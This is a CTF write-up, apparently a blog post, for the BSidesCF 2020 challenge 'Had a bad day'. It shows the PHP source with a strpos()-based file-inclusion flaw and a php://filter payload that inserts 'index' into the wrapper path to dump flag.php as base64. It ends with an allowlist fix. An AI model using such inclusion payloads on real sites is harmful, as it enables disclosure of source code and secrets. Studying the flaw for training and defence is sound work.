[BSidesCF 2020] Had a bad day writeup

First, read the source of index.php with php://filter/convert.base64-encode/resource=index (in this challenge the name is passed without its extension, because the code appends .php itself):

    <?php
    $file = $_GET['category'];

    if(isset($file))
    {
        if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
            include ($file . '.php');
        }
        else{
            echo "Sorry, we currently only support woofers and meowers.";
        }
    }
    ?>

        </div>
      <form action="index.php" method="get" id="choice">
          <center><button onclick="document.getElementById('choice').submit();" name="category" value="woofers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Woofers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button>
          <button onclick="document.getElementById('choice').submit();" name="category" value="meowers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Meowers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button></center>
      </form>

strpos() returns the position of the first occurrence of the needle in the string, i.e. the number of characters that precede the match (and false when there is no match).

Clearly, the challenge requires the GET parameter to contain woofers, meowers or index, and then performs a file inclusion on it.

The key point is that the pseudo-protocol path can carry extra segments inside it: /index.php?category=php://filter/convert.base64-encode/index/resource=flag

Key takeaways:

1. strpos() returns the number of characters that precede the substring being searched for.

2. ?file=php://filter/convert.base64-encode/resource=flag.php    In a file inclusion vulnerability, passing this is equivalent to passing flag.php as the file to read.

3. ?file=php://filter/convert.base64-encode/resource=flag.php    Any characters can be inserted between /convert.base64-encode/ and /resource=flag.php without affecting the result. In this challenge, for example, the parameter must contain woofers, meowers or index, so inserting any one of those three yields the base64-encoded contents of flag.php.
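Why the substring check fails and what an allowlist looks like instead, as an added example that is not part of the original writeup or the challenge's code. It reproduces the challenge's strpos() condition beside a hardened replacement and runs both against constructed inputs: the two legitimate values and the payload from the writeup. The function names vulnerable_check and resolve_category are the example's own.

```php
<?php
// Added example (not the challenge's code): the original strpos() check beside
// an allowlist-based replacement, run against a few constructed inputs.

// The challenge's condition, reproduced for comparison: a substring test on
// the raw parameter, which the challenge then concatenates into include().
// Note that the "index" branch lacks "!== false", so any value containing
// "index" at a non-zero offset is accepted.
function vulnerable_check(string $file): bool
{
    return strpos($file, "woofers") !== false
        || strpos($file, "meowers") !== false
        || strpos($file, "index");
}

// Hardened version: compare the whole value against a fixed allowlist of page
// names and map it to a filename chosen by the server. Stream wrappers,
// directory segments and extra characters never reach include(); only the
// mapped filename (e.g. __DIR__ . '/' . $mapped) would be included.
function resolve_category(string $category): ?string
{
    $allowed = ['woofers' => 'woofers.php', 'meowers' => 'meowers.php'];
    return $allowed[$category] ?? null;
}

// Constructed inputs: the legitimate values plus the writeup's payload.
$inputs = [
    'woofers',
    'meowers',
    'php://filter/convert.base64-encode/index/resource=flag',
];

foreach ($inputs as $input) {
    printf(
        "%-56s  original: %-8s  hardened: %s\n",
        $input,
        vulnerable_check($input) ? 'accepted' : 'rejected',
        resolve_category($input) ?? 'rejected'
    );
}
```

The substring check accepts all three inputs; the allowlist accepts only the two page names and returns null for the wrapper payload, so the fix is to select the filename from a fixed table rather than validating a string that is later concatenated into include().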


posted @ 2022-06-27 02:28  Galio